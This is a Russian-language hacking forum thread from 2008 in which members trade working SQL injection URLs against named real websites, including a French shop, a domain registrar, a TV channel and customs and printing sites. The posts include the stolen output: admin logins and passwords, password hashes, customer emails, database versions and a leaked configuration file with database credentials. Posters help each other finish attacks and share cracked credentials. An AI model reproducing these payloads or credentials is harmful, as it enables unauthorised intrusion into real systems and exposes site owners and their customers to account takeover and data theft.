SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    jokester, сорри)
    Исправляемся:
    Сйт представляет услугу мониторинга seo-параметров, таких как
    Индекс цетирования Yandex тИЦ
    Индекс Google PageRank
    Количество проиндексированных страниц в Yandex
    Code:
    http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--
    Логин/пасс:
    Code:
    tigranav:8791109100
    --------------------------------------------------
    The End!
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    purple.fr магазинчик

    http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database(),user())/*

    5.0.32-Debian_7etch8-log/purple/purple@localhost


    http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login,passwd))+from+user/*

    root/6teutd7UL7NG.


    http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from+customer+limit+4200,1/*

    [email protected]/19l0ZUzMeK.b.
     
    1 person likes this.
  3. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--
    aDMin:03110WoodBury
     
    1 person likes this.
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Вот кароче что я обкуренный нафигачил:
    Code:
    http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
    Из таблицы tbladmins:
    Code:
    http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
    А вот составить финальный запрос не получилось, как я токо не шифровал...((((

    Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
    ------------------------------------------------------------
    The End!
     
  5. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(username,0x3A,password)))),3,4,5+from+naira_clients.tbladmins--
    За group_concat - спасибо, незнал.
     
    3 people like this.
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    -m0rgan-, а финальный - это какой ?)

    http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password),3,4,5+from+naira_clients.tbladmins

    ADMIN/E7AA807F2B59DE7B73495FF59B30EC26

    опередили, потрите плз )
     
    2 people like this.
  7. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username,password),3,4,5+from+naira_clients.tbladmins--
    элементарно,ватсон!
    расшифруете хеш пмните мне)))
     
  8. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    А мне он выдал

    http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5+from+admins--

    master:master

    тока в админку не пускает (
     
  9. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    И мне в ПМ плз!!!! :D :D :D
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Aattcottonbowl.com - PR5 ~2к
    4 ветка.. подбирайте поля )
     
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    // Оффтоп
    A чё это за naira_clients?
    Обьясните плиз!
     
  12. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    ТИЦ:160
    PR:6

    5.0.22-standard-logwebmaster@localhostvfscom_db


    PR:2
    4.1.22-standardwomenast_Astronomerswomenast_User@localhost
     
    #7192 -=Razor=-, 30 Dec 2008
    Last edited: 30 Dec 2008
  13. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    gtacom_gta@localhost:5.0.51a-community:gtacom_gta
    Code:
    http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--
    Code:
    http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin+limit+0,2--
    adminus:lPO7YBB0

    PR : 3
    ТиЦ : 300
     
    #7193 ..::TROYAN::.., 30 Dec 2008
    Last edited: 30 Dec 2008
    4 people like this.
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Samuseum.org - PR5 ~1.5к
    Brightstar.com.tw - PR3 ~0.5к
    http://www.brightstar.com.tw/asp_admin/index.fcgi
     
    #7194 sabe, 30 Dec 2008
    Last edited: 30 Dec 2008
    1 person likes this.
  15. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    pro100.tv
    Я конечно ХЗ но для меня это канал сектантов (CNL)
    Целыми днями трындят о "боге", это ппц, сектанты херовы!!!111
    Ни админки, ничё не нащёл, у них сайт из 1 файла штоле...

    Code:
    http://pro100.tv/comments.php?curid=-1'+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,VERSION(),DATABASE(),USER()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    А вот и сам канал
    Code:
    http://www.cnl.tv/watch_us/programs.php?programID=-1'+UNION+SELECT+concat_ws(0x3a,VERSION(),DATABASE(),USER())/*
    Вывод в тайтле
    Code:
    5.0.45:cnl_tv_2008:cnl_tv_user@localhost
    ===============
    Итого:
    http://www.cnl.tv/admin/
    emanuel:supertest
    http://www.cnl.tv/admin/file_editor.inc.php токо чёто он не пахает :(
    Прав нет =\
    Зато конфиг есть :D
    Code:
    /mySQL
    $DatabaseName 			= "cnltv3_utf8";
    $DbHostName 			= "localhost";
    $DbUserName 			= "cnltv3_cnluser";
    $admin_password			= "cnlconnect"; // for admin directly in pages. like Read more function.
    Серверный путь походу /home/cnl.tv/html
    Аа... Или "D:/WebServers/home/nlbc/cnl.tv"; //D:/WebServers/home/192.168.0.24/www

    Тута есть залитие имаг, если выбрать Flag icon то должна залиться в http://www.cnl.tv/mages/flags/ но толи у мя проксик левый толи прав нет
     
    #7195 Ponchik, 30 Dec 2008
    Last edited: 30 Dec 2008
    1 person likes this.
  16. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://guttenberg.org.ru/f_mess.php?thing=-3+union+select+1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6--
    tarifsss_gb@localhost:tarifsss_gb:4.0.27-log
     
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    24rus.ru - PR6 ~2.5к
    хоть какойто вывод ;)

    19rus.ru - PR6 ~2.5к
    наслаждаемся пищей) делимся результатов в пм )
     
    3 people like this.
  18. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.alta.ru/faq.php?id=-1+union+select+concat_ws(char(32,45,32),admin_id,login,password,checknum,agent,email,access),2,3,4,5+from+altaru_dealers.svts_admins--
    ТИЦ : 450 PR: 5
    Есть форум с 2722 юзеров.
    --------
     
    7 people like this.
  19. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
    А далее мозгов не хватает
     
    1 person likes this.
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.megaprint.com.ua/product.php?idr=107&idt=-1+union+select+group_concat(table_name,0x3a,table_rows),2,3,4,5,6+from+information_schema.tables--
    Code:
    http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users+limit+0,1--
     
Thread Status:
Not open for further replies.